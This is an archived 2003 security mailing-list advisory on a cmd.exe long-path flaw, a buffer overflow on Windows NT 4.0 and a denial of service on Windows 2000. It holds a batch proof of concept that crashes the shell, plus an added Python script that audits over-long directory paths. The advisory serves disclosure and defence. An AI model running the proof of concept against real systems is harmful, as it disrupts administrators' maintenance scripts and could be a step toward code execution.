[NT] Windows NT 4.0/2000 cmd.exe Long Path Buffer Overflow/DoS

From: support@securiteam.com
Date: 02/15/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 15 Feb 2003 21:39:06 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Windows NT 4.0/2000 cmd.exe Long Path Buffer Overflow/DoS
    ------------------------------------------------------------------------

    SUMMARY

    cmd.exe is the command processor of the Windows NT OS family. It is also used
    to process .bat and .cmd batch files. Many system administrators run batch
    files with elevated privileges for system maintenance. cmd.exe has a flaw in
    processing the "cd" command on a long path name. Under Windows NT 4.0, it may
    cause a buffer overflow; on Windows 2000, failure of batch file processing.

    DETAILS

    Vulnerable systems:
     * Microsoft Windows NT 4.0 (buffer overflow)
     * Microsoft Windows 2000 (DoS)

    The NTFS file system allows creating paths of almost unlimited length.
    However, the Windows API does not allow a path longer than 256 bytes. To
    prevent the Windows API from checking the requested path, the \\?\ prefix may
    be used on the filename. This is a documented feature of the Windows API.

    cmd.exe from Windows NT 4.0 has a trivial buffer overflow in the CD command if
    the destination path is longer than 256 characters. This vulnerability may be
    trivially exploited to execute code.

    cmd.exe from Windows 2000 has no buffer overflow, but when changing to a
    directory with a path slightly longer than 256 characters (for example 260
    characters), cmd.exe becomes "jailed" in this directory, meaning that the
    "cd .." command will fail. This may cause a DoS against a maintenance batch
    script.

    Exploitation:
    @echo off
    REM A is a ~200-character directory name, B a ~50-character one (the SET A line
    REM was wrapped by mail formatting and is restored to a single line here)
    SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    REM the \\?\ prefix lets mkdir create paths beyond the Windows API length check
    mkdir \\?\c:\%A%
    mkdir \\?\c:\%A%\%A%
    mkdir \\?\c:\%A%\%B%\
    c:
    cd \
    cd AAAAAAAAAAAA*
    REM second cd into AA...\AA... (path > 256 characters) crashes cmd.exe on NT 4.0
    cd AAAAAAAAAAAA*
    REM on Windows 2000 this lands in AA...\BB... (about 260 characters) and cd .. then fails
    cd BBBBBBBBBBBB*
    cd ..

    This creates a directory with two subdirectories. The first one demonstrates
    the buffer overflow on Windows NT 4.0 (the second cd AAAAAAAAA* command will
    crash cmd.exe with EIP overwritten); the second one demonstrates cmd.exe
    changing directory to AA...\BB..., after which the "cd .." command will fail.
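    As an added example (not part of the advisory or the author's code), the following Python audit walks a directory tree and reports the shallowest directories whose full path exceeds the length limit the advisory describes, so a maintenance batch file's author can find the directories a "cd" cannot safely enter before the script relies on it. The 256 limit follows the advisory text; the sample tree, shaped like the PoC's AA...\AA... and AA...\BB... layout, is constructed inline with 100- and 50-character names, which are assumptions.

```python
import os
import tempfile

# The advisory states a 256-byte limit for the Windows API; the Win32 MAX_PATH
# constant is 260 (including the terminating NUL). 256 is used here to match the text.
PATH_LIMIT = 256

def strip_extended_prefix(path):
    """Drop the extended-length (\\\\?\\) prefix so the reported length is that of the plain path."""
    if path.startswith("\\\\?\\UNC\\"):
        return "\\\\" + path[len("\\\\?\\UNC\\"):]
    if path.startswith("\\\\?\\"):
        return path[len("\\\\?\\"):]
    return path

def find_long_dirs(root, limit=PATH_LIMIT):
    """Return sorted (length, path) pairs for directories under root whose full path
    exceeds limit: the directories a maintenance batch file cannot safely cd into
    (cmd.exe on NT 4.0 overflows; on Windows 2000 'cd ..' stops working)."""
    root = strip_extended_prefix(os.path.abspath(root))
    hits = []
    for dirpath, dirnames, _files in os.walk(root):
        if len(dirpath) > limit:
            hits.append((len(dirpath), dirpath))
            dirnames[:] = []  # every child is longer still; report only the shallowest offender
    return sorted(hits)

def build_sample_tree():
    """Constructed sample input (hypothetical, not from the advisory): a temp tree with
    a 100-character A directory holding A/A/A nesting and a 50-character B directory."""
    root = tempfile.mkdtemp()
    a_dir = os.path.join(root, "A" * 100)
    os.makedirs(os.path.join(a_dir, "A" * 100, "A" * 100))
    os.makedirs(os.path.join(a_dir, "B" * 50))
    return root

def audit_sample(margin=150):
    """Audit the constructed tree with a limit of len(root)+margin so the result does
    not depend on the temp directory's own length. Returns offending path lengths
    measured from root, e.g. [152, 202] for the default margin."""
    root = build_sample_tree()
    hits = find_long_dirs(root, limit=len(root) + margin)
    return [length - len(root) for length, _ in hits]

if __name__ == "__main__":
    # Audit the current working directory against the advisory's limit.
    for length, path in find_long_dirs(os.getcwd()):
        print(length, path)
```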

    Vendor response:
    Microsoft acknowledged problem.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:3APA3A@SECURITY.NNOV.RU>
    3APA3A.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
